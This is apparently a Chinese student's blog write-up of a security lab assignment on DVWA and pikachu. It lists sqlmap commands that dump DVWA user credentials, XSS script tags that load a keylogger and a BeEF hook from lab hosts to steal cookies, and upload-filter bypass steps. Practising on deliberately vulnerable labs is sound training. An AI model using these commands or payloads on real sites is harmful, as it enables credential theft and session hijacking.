C9第九周

任务目标

1、使用Sqlmap工具完成对DVWA数据库注入过程,要求按照库、表、列、内容的顺序进行注入
2、XSS
(1)使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie
(2)使用beef进行钓鱼,获取用户cookie
3、文件上传:
(1)客户端绕过练习
(2)服务端黑名单绕过:给出.htaccess文件绕过的具体步骤

<任务一>

使用Sqlmap工具完成对DVWA数据库注入过程,要求按照库、表、列、内容的顺序进行注入

库名-->表名-->字段名-->内容

sqlmap.py -r D:\web\software\sqlmap\1.txt --dbs --batch

sqlmap.py -r D:\web\software\sqlmap\1.txt -D dvwa --tables --batch

sqlmap.py -r D:\web\software\sqlmap\1.txt -D dvwa -T users --columns --batch

sqlmap.py -r D:\web\software\sqlmap\1.txt -D dvwa -T users -C user,password --dump --batch

<任务二>

XSS
(1)使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie
(2)使用beef进行钓鱼,获取用户cookie

任务二(1)

查看pikachu自带XSS键盘记录利用脚本 /var/www/html/pkxss/rkeypress/rk.js

在存储型XSS模块输入payload:

<script src="http://10.0.0.155:8083/pkxss/rkeypress/rk.js"></script>

前端输入:c9019_yancy666

后台看到记录成功

任务二(2)

使用beef进行钓鱼,获取用户cookie

<script src="http://10.0.0.154:3000/hook.js"></script>

<任务三>

文件上传:
(1)客户端绕过练习
(2)服务端黑名单绕过:给出.htaccess文件绕过的具体步骤

任务三(1)

客户端绕过练习
前端禁JS

改后缀名

删前端代码

服务端黑名单绕过

给出.htaccess文件绕过的具体步骤


评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值